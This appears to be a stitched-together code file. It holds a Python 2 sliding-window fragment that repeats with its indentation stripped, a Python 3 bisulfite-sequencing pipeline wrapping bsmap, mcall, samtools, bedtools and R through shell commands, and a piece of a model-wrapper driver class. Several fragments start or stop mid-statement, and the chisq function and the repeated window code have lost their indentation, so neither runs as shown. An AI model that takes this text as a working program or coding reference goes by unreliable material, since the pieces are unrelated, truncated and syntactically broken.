    for a in xrange(N):
        if b < a:
            b += 1
        # Greedily advance b while the next window does not score better.
        while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
            1, total, totalsum):
            b += 1
        best = min(best, getsum(a, b, total, totalsum))
    return r
def func_4e2e5c8fcc194f20993cddfdc052c55a(infile):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b | |
#!/usr/bin/env python3
# vim: set noexpandtab tabstop=2 shiftwidth=2 softtabstop=-1 fileencoding=utf-8:
__version__ = "0.0.3.2"
import os
import sys
import argparse
import yaml
import subprocess
def runcmd(cmd, log=subprocess.PIPE, echo=False):
    """Run `cmd` through `bash -c`, terminating the whole process on failure.

    Args:
        cmd: Command string. NOTE(review): it is interpolated unquoted into
            a shell line, so it must be trusted input (shell injection risk
            for untrusted data).
        log: Destination for stdout; stderr is merged into stdout.
        echo: If True, print the command before running it.

    Returns:
        subprocess.CompletedProcess of the finished command.
    """
    if echo:
        print('Running: ' + cmd)
    try:
        # Double shell: shell=True already invokes /bin/sh, which in turn
        # launches `bash -c "<cmd>"` so bash-isms in cmd work.
        cp=subprocess.run('bash -c "%s"' % cmd, universal_newlines=True, shell=True, stdout=log, stderr=subprocess.STDOUT)
        if cp.returncode != 0:
            print('Error: %s failed.' % cmd, vars(cp), sep='\n', file=sys.stderr)
            sys.exit(-1)
    except OSError as e:
        print("Execution failed: ", e, file=sys.stderr)
        sys.exit(-1)
    return cp
def runcmdsh(cmd, log=subprocess.PIPE, echo=False):
    """Run `cmd` with the default shell (no bash wrapper), exiting on failure.

    Args:
        cmd: Shell command string (trusted input; no escaping is applied).
        log: Destination for stdout; stderr is merged into stdout.
        echo: If True, print the command before running it.

    Returns:
        subprocess.CompletedProcess of the finished command.
    """
    if echo:
        print('Running: ' + cmd)
    try:
        cp=subprocess.run(cmd, universal_newlines=True, shell=True, stdout=log, stderr=subprocess.STDOUT)
        if cp.returncode != 0:
            print('Error: %s failed.' % cmd, vars(cp), sep='\n', file=sys.stderr)
            sys.exit(-1)
    except OSError as e:
        print("Execution failed: ", e, file=sys.stderr)
        sys.exit(-1)
    return cp
def makedirectory(path, echo=False):
    """Ensure the parent directory of `path` exists (like `mkdir -p`).

    Args:
        path: File path whose parent directory should be created.
        echo: If True, print the equivalent command being performed.
    """
    # Improvement: call os.makedirs directly instead of shelling out to
    # `mkdir -p` -- no subprocess overhead and no quoting issues with
    # unusual path names.
    target = os.path.dirname(path) or '.'
    if echo:
        print('Running: mkdir -p %s' % target)
    os.makedirs(target, exist_ok=True)
def lnfile(infile, outfile, verbose=False):
    """Symlink `infile` to `outfile` (creating parent dirs), unless the
    target already exists.

    Uses `ln -sf` so an existing (dangling) link at `outfile` is replaced.
    """
    if os.path.exists(outfile):
        return
    makedirectory(outfile, verbose)
    runcmd('ln -sf %s %s' % (infile, outfile), echo=verbose)
def bsmap_runcmd(fname, reference, numthread, outfile, verbose=False):
    """Align single-end reads with bsmap, writing a BAM to `outfile`.

    Skips work if `outfile` already exists (resumable pipeline). bsmap
    stdout/stderr are captured in `<outfile>.stdout`.
    """
    if os.path.exists(outfile):
        return
    makedirectory(outfile, verbose)
    cmd = 'bsmap -a %s -d %s -n 1 -r 0 -S 1234 -p %d -o %s' % (fname, reference, numthread, outfile)
    # Fix: close the log file handle deterministically -- the original
    # passed an open() result that was never closed.
    with open(outfile + ".stdout", 'w+') as log:
        runcmd(cmd, log=log, echo=verbose)
def bsmap_runcmd_pe(fname1, fname2, reference, numthread, outfile, verbose=False):
    """Align paired-end reads with bsmap, writing a BAM to `outfile`.

    Skips work if `outfile` already exists. bsmap stdout/stderr are
    captured in `<outfile>.stdout`.
    """
    if os.path.exists(outfile):
        return
    makedirectory(outfile, verbose)
    cmd = 'bsmap -a %s -b %s -d %s -n 1 -r 0 -S 1234 -p %d -o %s' % (fname1, fname2, reference, numthread, outfile)
    # Fix: close the log file handle deterministically -- the original
    # passed an open() result that was never closed.
    with open(outfile + ".stdout", 'w+') as log:
        runcmd(cmd, log=log, echo=verbose)
def bsmap_ref(config, reference):
    """Align every sample against `reference` ('reference' or 'spikein'),
    producing one BAM per sample under resultdir/bsmap/<reference>/.

    Existing output BAMs are kept (resumable). When aligninfo.inputbam is
    set, pre-aligned BAMs are linked or merged instead of running bsmap.
    """
    outbasedir=os.path.join(config['resultdir'], 'bsmap', reference)
    for sampleinfo in config['sampleinfo']:
        outfile=os.path.join(outbasedir, sampleinfo['sampleid'] + '.bam')
        if os.path.exists(outfile):
            continue
        if 'inputbam' in config['aligninfo'] and config['aligninfo']['inputbam']: # input BAM files
            if len(sampleinfo[reference]) > 1:
                # Multiple pre-aligned BAMs for this sample: merge them.
                runcmd('samtools merge ' + outfile + ' ' + ' '.join(sampleinfo[reference]), echo=config['aligninfo']['verbose'])
            else:
                fname=sampleinfo[reference][0]
                lnfile(fname, outfile, config['aligninfo']['verbose'])
        else:
            if len(sampleinfo['filenames']) > 1:
                # Align each FASTQ separately, then merge the per-file BAMs.
                files = ''
                for f in sampleinfo['filenames']:
                    # Strip two extensions, e.g. sample.fq.gz -> sample.
                    bname=os.path.splitext(os.path.splitext(os.path.basename(f))[0])[0];
                    fname=f
                    singlefile=os.path.join(outbasedir, 'single', bname + '.bam')
                    bsmap_runcmd(fname, config['aligninfo'][reference], config['aligninfo']['numthreads'], singlefile)
                    files += ' ' + singlefile
                runcmd('samtools merge ' + outfile + ' ' + files, echo=config['aligninfo']['verbose'])
            else:
                fname=sampleinfo['filenames'][0]
                bsmap_runcmd(fname, config['aligninfo'][reference], config['aligninfo']['numthreads'], outfile, config['aligninfo']['verbose'])
import re
def bsmap_stat_parse(infile):
    """Parse a bsmap stdout capture for read counts.

    Args:
        infile: Path to the `<bam>.stdout` log written during alignment.

    Returns:
        tuple: (total_reads, aligned_reads, unique_reads); (0, 0, 0) when
        the file does not exist.
    """
    if not os.path.exists(infile):
        return (0, 0, 0)
    with open(infile) as f:
        dstr = f.read()
    # Fix: use raw strings for the regexes -- '\d' in a normal string is an
    # invalid escape sequence (DeprecationWarning, an error in future
    # Python versions).
    totalreads = int(re.search(r'total reads: (\d+)', dstr).group(1))
    alignedreads = int(re.search(r'aligned reads: (\d+)', dstr).group(1))
    uniquereads = int(re.search(r'unique reads: (\d+)', dstr).group(1))
    return (totalreads, alignedreads, uniquereads)
def bam_numreads(infile):
    """Count the reads in a BAM file using `samtools view -c`.

    Returns 0 when `infile` does not exist.
    """
    if not os.path.exists(infile):
        return 0
    result = runcmdsh('samtools view -c %s' % infile)
    return int(result.stdout.strip())
def bsmap_stat(config, reference):
    """Collect per-sample read counts for `reference` alignments.

    Returns:
        dict: sampleid -> (total_reads, aligned_reads, unique_reads).

    With pre-aligned input BAMs there are no bsmap logs, so counts come
    from `samtools view -c` and the three numbers are identical.
    """
    basedir=os.path.join(config['resultdir'], 'bsmap')
    stats = {}
    if 'inputbam' in config['aligninfo'] and config['aligninfo']['inputbam']:
        for sampleinfo in config['sampleinfo']:
            if 'filenames' in sampleinfo and len(sampleinfo['filenames']) > 1:
                # Sum counts over the per-file BAMs aligned separately.
                totalr=0
                for fname in sampleinfo['filenames']:
                    bname=os.path.splitext(os.path.splitext(os.path.basename(fname))[0])[0];
                    f=os.path.join(basedir, reference, 'single', bname + '.bam')
                    totalr += bam_numreads(f)
                stats[sampleinfo['sampleid']] = (totalr, totalr, totalr)
            else:
                f=os.path.join(basedir, reference, sampleinfo['sampleid'] + '.bam')
                totalr=bam_numreads(f)
                stats[sampleinfo['sampleid']] = (totalr, totalr, totalr)
    else:
        for sampleinfo in config['sampleinfo']:
            if 'filenames' in sampleinfo and len(sampleinfo['filenames']) > 1:
                # Aggregate the bsmap log stats of each per-file alignment.
                totalr=0
                alignedr=0
                uniquer=0
                for fname in sampleinfo['filenames']:
                    bname=os.path.splitext(os.path.splitext(os.path.basename(fname))[0])[0];
                    f=os.path.join(basedir, reference, 'single', bname + '.bam.stdout')
                    ftotalr, falignedr, funiquer = bsmap_stat_parse(f)
                    totalr += ftotalr
                    alignedr += falignedr
                    uniquer += funiquer
                stats[sampleinfo['sampleid']] = (totalr, alignedr, uniquer)
            else:
                f=os.path.join(basedir, reference, sampleinfo['sampleid'] + '.bam.stdout')
                stats[sampleinfo['sampleid']] = bsmap_stat_parse(f)
    return stats
def bsmap(config):
    """Run bsmap alignment (plus optional spike-in) and gather mapping stats.

    Returns:
        dict: reference name -> per-sample (total, aligned, unique) tuples.
    """
    verbose = config['aligninfo']['verbose']
    if verbose:
        print('==>bsmap<==')
    references = ['reference']
    if config['aligninfo']['usespikein']:
        references.append('spikein')
    mpstat = {}
    for ref in references:
        bsmap_ref(config, ref)
        mpstat[ref] = bsmap_stat(config, ref)
    if verbose:
        print(mpstat)
    return mpstat
def mcall_stat_parse(infile):
    """Extract the bisulfite conversion ratio from an mcall stat file.

    Returns:
        float: The parsed ratio, or 0 when the file does not exist.
    """
    if not os.path.exists(infile):
        return 0
    with open(infile) as f:
        dstr = f.read()
    # Fix: raw string for the regex -- '\d' in a normal string is an
    # invalid escape sequence (DeprecationWarning in modern Python).
    return float(re.search(r'bisulfite conversion ratio = ([\d.]+)', dstr).group(1))
def mcall_runcmd(infile, outdir, sampleid, reference, numthread, verbose=False):
    """Run mcall on a BAM (through a symlink in `outdir`) and return its
    bisulfite conversion ratio.

    If the mcall stat file already exists the cached result is parsed and
    returned without rerunning mcall.
    """
    linkfile = os.path.join(outdir, sampleid + '.bam')
    statfile = linkfile + '_stat.txt'
    if os.path.exists(statfile):
        return mcall_stat_parse(statfile)
    lnfile(os.path.abspath(infile), linkfile)
    cmd = 'cd %s && mcall -m %s -r %s --sampleName %s -p %s' % (os.path.dirname(linkfile), os.path.basename(linkfile), reference, sampleid, numthread)
    # Fix: close the log handle deterministically -- the original leaked
    # the handle returned by open().
    with open(linkfile + ".stdout", 'w+') as log:
        runcmd(cmd, log=log, echo=verbose)
    return mcall_stat_parse(statfile)
def mcall_ref(config, reference):
    """Run mcall for every sample against `reference`.

    Returns:
        dict: sampleid -> bisulfite conversion ratio.
    """
    inbasedir=os.path.join(config['resultdir'], 'bsmap', reference)
    outbasedir=os.path.join(config['resultdir'], 'mcall', reference)
    stats = {}
    for sampleinfo in config['sampleinfo']:
        infile=os.path.join(inbasedir, sampleinfo['sampleid'] + '.bam')
        outdir=os.path.join(outbasedir, sampleinfo['sampleid'])
        stats[sampleinfo['sampleid']] = mcall_runcmd(infile
                , outdir
                , sampleinfo['sampleid']
                , config['aligninfo'][reference]
                , config['aligninfo']['numthreads']
                , config['aligninfo']['verbose']
                )
    return stats
def mcall(config):
    """Run mcall methylation calling and collect conversion-ratio stats.

    Returns:
        dict: reference name -> {sampleid: conversion ratio}.
    """
    verbose = config['aligninfo']['verbose']
    if verbose:
        print('==>mcall<==')
    mcstat = {'reference': mcall_ref(config, 'reference')}
    if config['aligninfo']['usespikein']:
        mcstat['spikein'] = mcall_ref(config, 'spikein')
    if verbose:
        print(mcstat)
    return mcstat
def removeCommonReads_runcmd(infile1, infile2, outfile1, outfile2, verbose=False):
    """Remove reads shared between two BAMs via the bundled perl script.

    The script writes SAM outputs (converted back to BAM here) and prints
    the number of common reads removed, which is returned as int.
    """
    # NOTE(review): `bin` shadows the builtin of the same name.
    bin=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'perl', 'removeCommonRead.pl')
    makedirectory(outfile1)
    makedirectory(outfile2)
    outsam1=outfile1+".sam"
    outsam2=outfile2+".sam"
    cmd = bin + ' ' + infile1 + ' ' + infile2 + ' ' + outsam1 + ' ' + outsam2
    cp=runcmd(cmd, echo=verbose)
    # Convert the temporary SAM outputs to BAM, then delete them.
    runcmd('samtools view -bS -o %s %s' % (outfile1, outsam1))
    runcmd('samtools view -bS -o %s %s' % (outfile2, outsam2))
    runcmd('rm -f %s %s' % (outsam1, outsam2))
    return int(cp.stdout.strip())
def removeCommonReads(config):
    """Remove reads common to the reference and spike-in alignments for
    every sample.

    Returns:
        dict: sampleid -> number of common reads removed.
    """
    if config['aligninfo']['verbose']:
        print('==>removeCommonReads<==')
    inbasedir=os.path.join(config['resultdir'], 'bsmap')
    outbasedir=os.path.join(config['resultdir'], 'removeCommonReads')
    comm={}
    for sampleinfo in config['sampleinfo']:
        refinfile=os.path.join(inbasedir, 'reference', sampleinfo['sampleid'] + '.bam')
        spkinfile=os.path.join(inbasedir, 'spikein', sampleinfo['sampleid'] + '.bam')
        refoutfile=os.path.join(outbasedir, 'reference', sampleinfo['sampleid'] + '.bam')
        spkoutfile=os.path.join(outbasedir, 'spikein', sampleinfo['sampleid'] + '.bam')
        comm[sampleinfo['sampleid']] = removeCommonReads_runcmd(refinfile, spkinfile, refoutfile, spkoutfile, config['aligninfo']['verbose'])
    if config['aligninfo']['verbose']:
        print(comm)
    return comm
def totalwigsums_n(f):
    """Total wigsum of a BAM: sum over coverage intervals of depth*length,
    computed with `bedtools genomecov -bg` piped through awk."""
    cmd = "bedtools genomecov -ibam %s -bg | awk -v FS='\\t' -v OFS='\\t' -e 'BEGIN { sum=0 } { sum += $4*($3-$2) } END { print sum }'" % f
    cp=runcmdsh(cmd)
    return int(cp.stdout.strip())
def totalwigsums(config):
    """Compute total wigsums per sample for the reference (and spike-in).

    Input BAMs come from removeCommonReads when spike-in is enabled,
    otherwise directly from bsmap.

    Returns:
        dict: reference name -> {sampleid: total wigsum}.
    """
    verbose = config['aligninfo']['verbose']
    if verbose:
        print('==>totalwigsums<==')
    usespikein = config['aligninfo']['usespikein']
    inbasedir = os.path.join(config['resultdir'], 'removeCommonReads' if usespikein else 'bsmap')
    references = ['reference', 'spikein'] if usespikein else ['reference']
    twss = {}
    for reference in references:
        twss[reference] = {
            s['sampleid']: totalwigsums_n(os.path.join(inbasedir, reference, s['sampleid'] + '.bam'))
            for s in config['sampleinfo']
        }
    if verbose:
        print(twss)
    return twss
import statistics
def estimateSizeFactors(tws, verbose=False):
    """Per-sample size factor: median total wigsum / sample's total wigsum.

    Args:
        tws: dict of sampleid -> total wigsum.
        verbose: If True, print a banner and the result.

    Returns:
        dict: sampleid -> size factor.
    """
    if verbose:
        print('==>estimateSizeFactors<==')
    median_ws = statistics.median(tws.values())
    factors = {}
    for sample, ws in tws.items():
        factors[sample] = median_ws / ws
    if verbose:
        print(factors)
    return factors
def normalizetwsref(tws, sizefactors, verbose=False):
    """Scale each sample's total wigsum by its size factor.

    Args:
        tws: dict of sampleid -> total wigsum.
        sizefactors: dict of sampleid -> size factor.
        verbose: If True, print a banner and the result.

    Returns:
        dict: sampleid -> normalized total wigsum.
    """
    if verbose:
        print('==>normalizetwsref<==')
    normalized = {}
    for sample, ws in tws.items():
        normalized[sample] = ws * sizefactors[sample]
    if verbose:
        print(normalized)
    return normalized
def saveQCstats(config, statfile, qcstats):
    """Write per-sample QC statistics to `statfile` as a TSV table.

    With spike-in enabled the table includes spike-in columns; otherwise a
    reduced reference-only table is written. Ratio columns are formatted as
    percentages and emitted as 'NA' when the denominator is zero.
    """
    with open(statfile, 'w+') as f:
        if config['aligninfo']['usespikein']:
            print('\t'.join((
                'sample_id'
                , 'total'
                , 'unique_ref'
                , 'ref/total'
                , 'unique_spk'
                , 'spk/total'
                , 'comm'
                , 'comm/total'
                , 'comm/unique_ref'
                , 'twss_spk'
                , 'sizefactors'
                , 'twss_ref'
                , 'twss_ref_norm'
                , 'bcr_ref'
                , 'bcr_spk'
                )), file=f)
            for sampleinfo in config['sampleinfo']:
                sampleid = sampleinfo['sampleid']
                total = qcstats['mpstat']['reference'][sampleid][0] if sampleid in qcstats['mpstat']['reference'] else 0
                unique_ref = qcstats['mpstat']['reference'][sampleid][2] if sampleid in qcstats['mpstat']['reference'] else 0
                # Fix: the guard tested membership in the 'reference' stats
                # (copy-paste error), which raised KeyError whenever a sample
                # was missing from the spike-in stats.
                unique_spk = qcstats['mpstat']['spikein'][sampleid][2] if sampleid in qcstats['mpstat']['spikein'] else 0
                comm = qcstats['comm'][sampleid]
                twss_spk = qcstats['twss']['spikein'][sampleid]
                sizefactors = qcstats['sizefactors'][sampleid]
                twss_ref = qcstats['twss']['reference'][sampleid]
                twss_ref_norm = qcstats['twsrefnorm'][sampleid]
                bcr_ref = qcstats['mcstat']['reference'][sampleid]
                bcr_spk = qcstats['mcstat']['spikein'][sampleid]
                print('\t'.join(map(str
                    , (sampleid
                        , total
                        , unique_ref
                        , '{:.2%}'.format(unique_ref/total) if total>0 else 'NA'
                        , unique_spk
                        , '{:.2%}'.format(unique_spk/total) if total>0 else 'NA'
                        , comm
                        , '{:.2%}'.format(comm/total) if total>0 else 'NA'
                        , '{:.2%}'.format(comm/unique_ref) if unique_ref>0 else 'NA'
                        , twss_spk
                        , '{:.2f}'.format(sizefactors)
                        , twss_ref
                        , '{:.0f}'.format(twss_ref_norm)
                        , '{:.6f}'.format(bcr_ref)
                        , '{:.6f}'.format(bcr_spk)
                        )
                    )), file=f)
        else:
            print('\t'.join((
                'sample_id'
                , 'total'
                , 'unique_ref'
                , 'ref/total'
                , 'twss_ref'
                , 'sizefactors'
                , 'twss_ref_norm'
                , 'bcr_ref'
                )), file=f)
            for sampleinfo in config['sampleinfo']:
                sampleid = sampleinfo['sampleid']
                total = qcstats['mpstat']['reference'][sampleid][0] if sampleid in qcstats['mpstat']['reference'] else 0
                unique_ref = qcstats['mpstat']['reference'][sampleid][2] if sampleid in qcstats['mpstat']['reference'] else 0
                twss_ref = qcstats['twss']['reference'][sampleid]
                sizefactors = qcstats['sizefactors'][sampleid]
                twss_ref_norm = qcstats['twsrefnorm'][sampleid]
                bcr_ref = qcstats['mcstat']['reference'][sampleid]
                print('\t'.join(map(str
                    , (sampleid
                        , total
                        , unique_ref
                        , '{:.2%}'.format(unique_ref/total) if total>0 else 'NA'
                        , twss_ref
                        , '{:.2f}'.format(sizefactors)
                        , '{:.0f}'.format(twss_ref_norm)
                        , '{:.6f}'.format(bcr_ref)
                        )
                    )), file=f)
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
def barplot(config, tws):
    """Save a bar chart of normalized total wigsums per sample.

    Output path, figure width and height come from aligninfo.barplotinfo
    in the config.
    """
    outfile=os.path.join(config['resultdir'], config['aligninfo']['barplotinfo']['outfile'])
    plt.figure(figsize=(config['aligninfo']['barplotinfo']['width'], config['aligninfo']['barplotinfo']['height']))
    ax=plt.axes()
    # Thousands separators on the y-axis tick labels.
    ax.yaxis.set_major_formatter(plt.FuncFormatter(lambda x, loc: '{:,}'.format(int(x))))
    # zip(*items) splits the dict into (sampleids, values) for plt.bar.
    plt.bar(*zip(*tws.items()), width=0.5, color='blue')
    plt.title('Normalized total wigsum')
    makedirectory(outfile)
    plt.savefig(outfile, bbox_inches='tight')
def removedupref(config):
    """Remove duplicate reads from each sample's reference BAM with
    `samtools rmdup -s`.

    Input comes from removeCommonReads when spike-in is enabled, otherwise
    from bsmap; output goes to resultdir/removedupref/.
    """
    if config['aligninfo']['verbose']:
        print('==>removedupref<==')
    indir=os.path.join(config['resultdir'], 'removeCommonReads' if config['aligninfo']['usespikein'] else 'bsmap', 'reference')
    outdir=os.path.join(config['resultdir'], 'removedupref')
    for sampleinfo in config['sampleinfo']:
        infile=os.path.join(indir, sampleinfo['sampleid'] + '.bam')
        outfile=os.path.join(outdir, sampleinfo['sampleid'] + '.bam')
        makedirectory(outfile)
        runcmd('samtools rmdup -s %s %s' % (infile, outfile), echo=config['aligninfo']['verbose'])
def bamtobed(config):
    """Convert each deduplicated BAM to BED with `bedtools bamtobed`.

    Existing outputs are kept (resumable).

    Returns:
        str: The output directory containing the per-sample BED files.
    """
    if config['genomescaninfo']['verbose']:
        print('==>bamtobed<==')
    indir=os.path.join(config['resultdir'], 'removedupref')
    outdir=os.path.join(config['resultdir'], 'bamtobed')
    for sampleinfo in config['sampleinfo']:
        infile=os.path.join(indir, sampleinfo['sampleid'] + '.bam')
        outfile=os.path.join(outdir, sampleinfo['sampleid'] + '.bed')
        if os.path.exists(outfile):
            continue
        makedirectory(outfile)
        runcmd('bedtools bamtobed -i %s > %s' % (infile, outfile))
    return outdir
def readextension(config):
    """Extend each BED read in its strand direction to `fragsize` bases.

    Existing outputs are kept (resumable).

    Returns:
        str: The output directory containing the extended BED files.
    """
    if config['genomescaninfo']['verbose']:
        print('==>readextension<==')
    indir=os.path.join(config['resultdir'], 'bamtobed')
    outdir=os.path.join(config['resultdir'], 'readextension_frag'+str(config['genomescaninfo']['fragsize']))
    for sampleinfo in config['sampleinfo']:
        infile=os.path.join(indir, sampleinfo['sampleid'] + '.bed')
        outfile=os.path.join(outdir, sampleinfo['sampleid'] + '.bed')
        if os.path.exists(outfile):
            continue
        makedirectory(outfile)
        # '+' strand: move the end right; '-' strand: move the start left,
        # clamping at 0.
        cmd="awk -v FS='\\t' -v OFS='\\t' -v fragsize=%s -e '{ if ($6==\"+\") { $3=$2+fragsize } else if ($6==\"-\") { $2=$3-fragsize; if($2<0) { $2=0 } } print }' < %s > %s" % (
                config['genomescaninfo']['fragsize'], infile, outfile)
        # Fix: `verbose` was passed positionally into runcmdsh's second
        # parameter `log` (the stdout target); it belongs to `echo`.
        runcmdsh(cmd, echo=config['genomescaninfo']['verbose'])
    return outdir
def fetchChromSizes(config):
    """Download chromosome sizes for the configured reference genome via
    the UCSC `fetchChromSizes` tool, caching the result.

    Returns:
        str: Path to the genome file (`<referencename>_genomefile.txt`).
    """
    outfile=os.path.join(config['resultdir'], config['genomescaninfo']['referencename'] + '_genomefile.txt')
    if os.path.exists(outfile):
        return outfile
    makedirectory(outfile)
    runcmd('fetchChromSizes %s > %s' % (config['genomescaninfo']['referencename'], outfile), echo=config['genomescaninfo']['verbose'])
    return outfile
def makewindows(genomefile, windowsize, windowfile):
    """Tile the genome into fixed-size windows (sorted by position) using
    `bedtools makewindows`, writing the result to `windowfile`."""
    makedirectory(windowfile)
    runcmd('bedtools makewindows -g %s -w %s | sort -k 1,1 -k 2,2n -k 3,3n > %s' % (genomefile, windowsize, windowfile))
import tempfile
def tabulatereadcounts(config, windowfile, beddir, counttablefile):
    """Count reads per genomic window per sample and union the per-sample
    bedgraphs into one gzipped count table at `counttablefile`."""
    if config['genomescaninfo']['verbose']:
        print('==>tabulatereadcounts<==')
    # Fix: TemporaryDirectory(...).name drops the manager object
    # immediately, so its finalizer can delete the directory while it is
    # still in use; mkdtemp transfers ownership of the directory to us.
    cntdir=tempfile.mkdtemp(dir=config['resultdir'])
    for sampleinfo in config['sampleinfo']:
        infile=os.path.join(beddir, sampleinfo['sampleid'] + '.bed')
        outfile=os.path.join(cntdir, sampleinfo['sampleid'] + '.bedgraph')
        makedirectory(outfile)
        # Keep only windows with at least one read.
        cmd = "bedtools coverage -a %s -b %s -counts | awk -v FS='\\t' -v OFS='\\t' -e '$4>0' > %s" % (windowfile, infile, outfile)
        # Fix: `verbose` was passed positionally into runcmdsh's `log`
        # parameter; it belongs to `echo`.
        runcmdsh(cmd, echo=config['genomescaninfo']['verbose'])
    sampleids=[sampleinfo['sampleid'] for sampleinfo in config['sampleinfo']]
    fs=[os.path.join(cntdir, id+'.bedgraph') for id in sampleids]
    makedirectory(counttablefile)
    runcmd("bedtools unionbedg -i %s -header -names %s | gzip -n > %s" % (' '.join(fs), ' '.join(sampleids), counttablefile), echo=config['genomescaninfo']['verbose'])
    # Clean up the intermediate per-sample bedgraphs.
    for sampleinfo in config['sampleinfo']:
        runcmd('rm -f ' + os.path.join(cntdir, sampleinfo['sampleid'] + '.bedgraph'), echo=config['genomescaninfo']['verbose'])
    runcmd('rmdir --ignore-fail-on-non-empty ' + cntdir, echo=config['genomescaninfo']['verbose'])
def tabulatemeanwig(config, windowfile, genomefile, beddir, counttablefile):
    """Compute mean coverage (wigsum/windowsize) per window per sample and
    union the per-sample bedgraphs into one gzipped table."""
    if config['genomescaninfo']['verbose']:
        print('==>tabulatemeanwig<==')
    # Fix: TemporaryDirectory(...).name drops the manager object
    # immediately, so its finalizer can delete the directory while it is
    # still in use; mkdtemp transfers ownership of the directory to us.
    cntdir=tempfile.mkdtemp(dir=config['resultdir'])
    for sampleinfo in config['sampleinfo']:
        infile=os.path.join(beddir, sampleinfo['sampleid'] + '.bed')
        covfile=os.path.join(cntdir, sampleinfo['sampleid'] + '.genomecov.bedgraph')
        makedirectory(covfile)
        runcmd("bedtools genomecov -i %s -g %s -bg > %s" % (infile, genomefile, covfile), echo=config['genomescaninfo']['verbose'])
        outfile=os.path.join(cntdir, sampleinfo['sampleid'] + '.bedgraph')
        makedirectory(outfile)
        # depth * overlap / windowsize, summed per window = mean coverage.
        cmd = "bedtools intersect -a %s -b %s -wo | awk -v FS='\\t' -v OFS='\\t' -e '{ print $1, $2, $3, $7*$8/%d }' | sort -k 1,1 -k 2,2n -k 3,3n | bedtools groupby -g 1,2,3 -c 4 -o sum > %s" % (windowfile, covfile, config['genomescaninfo']['windowsize'], outfile)
        # Fix: `verbose` was passed positionally into runcmdsh's `log`
        # parameter; it belongs to `echo`.
        runcmdsh(cmd, echo=config['genomescaninfo']['verbose'])
    sampleids=[sampleinfo['sampleid'] for sampleinfo in config['sampleinfo']]
    fs=[os.path.join(cntdir, id+'.bedgraph') for id in sampleids]
    makedirectory(counttablefile)
    runcmd("bedtools unionbedg -i %s -header -names %s | gzip -n > %s" % (' '.join(fs), ' '.join(sampleids), counttablefile), echo=config['genomescaninfo']['verbose'])
    # Clean up intermediates.
    for sampleinfo in config['sampleinfo']:
        runcmd('rm -f ' + os.path.join(cntdir, sampleinfo['sampleid'] + '.genomecov.bedgraph'), echo=config['genomescaninfo']['verbose'])
        runcmd('rm -f ' + os.path.join(cntdir, sampleinfo['sampleid'] + '.bedgraph'), echo=config['genomescaninfo']['verbose'])
    runcmd('rmdir --ignore-fail-on-non-empty ' + cntdir, echo=config['genomescaninfo']['verbose'])
def swapdict(d):
    """Invert `d`, grouping keys that share a value.

    Returns:
        dict: value -> list of keys that mapped to it (insertion order).
    """
    inverted = {}
    for key, value in d.items():
        inverted.setdefault(value, []).append(key)
    return inverted
def ttest(config, statfile, counttablefile, testfile):
    """Run the R t-test DHMR analysis on the window count table.

    Builds per-group sample-id vectors from the config, then invokes R
    with p.adj.R and ttest.R sourced; parameters are injected as `-e`
    variable assignments. Results are written to `testfile`.
    """
    if config['dhmrinfo']['verbose']:
        print('==>t.test<==')
    sampleid2group={sampleinfo['sampleid']:sampleinfo['group'] for sampleinfo in config['sampleinfo']}
    group2sampleid=swapdict(sampleid2group)
    group1=group2sampleid[config['groupinfo']['group1']]
    group2=group2sampleid[config['groupinfo']['group2']]
    # R character vectors of sample ids, e.g. c('s1', 's2').
    g1str = 'c(' + ', '.join(["'" + name + "'" for name in group1]) + ')'
    g2str = 'c(' + ', '.join(["'" + name + "'" for name in group2]) + ')'
    adjscript=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'R', 'p.adj.R')
    rscript=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'R', 'ttest.R')
    cmd = "R --slave --no-save --no-restore --no-init-file -e \"numthreads=%s\" -e \"nsplit=%s\" -e \"infile='%s'\" -e \"sf_file='%s'\" -e \"mindepth=%d\" -e \"group1=%s\" -e \"group2=%s\" -e \"outfile='%s'\" -e \"keepNA=%s\" -e \"source('%s')\" -e \"source('%s')\"" % (
            config['dhmrinfo']['numthreads'], config['dhmrinfo']['nsplit'], counttablefile, statfile, config['dhmrinfo']['meandepth']*(len(group1)+len(group2)), g1str, g2str, testfile, 'T' if config['dhmrinfo']['keepNA'] else 'F', adjscript, rscript
            )
    runcmdsh(cmd, echo=config['dhmrinfo']['verbose'])
def chisq(config, statfile, counttablefile, testfile):
if config['dhmrinfo']['verbose']:
print('==>chisq.test<==')
sampleid2group={sampleinfo['sampleid']:sampleinfo['group'] for sampleinfo in config['sampleinfo']}
group2sampleid=swapdict(sampleid2group)
group1=group2sampleid[config['groupinfo']['group1']]
group2=group2sampleid[config['groupinfo']['group2']]
g1str = 'c(' + ', '.join(["'" + name + "'" for name in group1]) + ')'
g2str = 'c(' + ', '.join(["'" + name + "'" for name in group2]) + ')'
adjscript=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'R', 'p.adj.R')
rscript=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'R', | |
args=self.args,
function=self.function,
is_server=self.is_server,
client_of=self.client_of,
inputs=self.inputs,
outputs=self.outputs,
iter_function_over=self.iter_function_over,
copies=self.copies)
self.preparsed_function = self.preparse_function(yml_mock)
self.model_function_info = self.preparsed_function['model_file']
self.model_function_file = self.model_function_info['model_file']
self.model_function_inputs = self.preparsed_function['inputs']
self.model_function_outputs = self.preparsed_function['outputs']
self.model_outputs_in_inputs = self.preparsed_function['outputs_in_inputs']
model_dir, model_base = os.path.split(self.model_function_file)
model_base = os.path.splitext(model_base)[0]
wrapper_fname = os.path.join(model_dir,
'ygg_%s_%s%s' % (model_base, self.name,
self.language_ext[0]))
lines = self.write_model_wrapper(model_name=self.name,
**self.preparsed_function)
# Write file
if (not os.path.isfile(wrapper_fname)) or self.overwrite:
with open(wrapper_fname, 'w') as fd:
fd.write('\n'.join(lines))
return wrapper_fname
@property
def numeric_logging_level(self):
    r"""int: Logging level for the model.

    Defaults to the effective level of this driver's logger; when
    self.logging_level is set, that level name is mapped to its numeric
    value instead.
    """
    out = self.logger.getEffectiveLevel()
    if self.logging_level:
        # logging.getLevelName maps a level name back to its numeric value.
        out = logging.getLevelName(self.logging_level)
    return out
@property
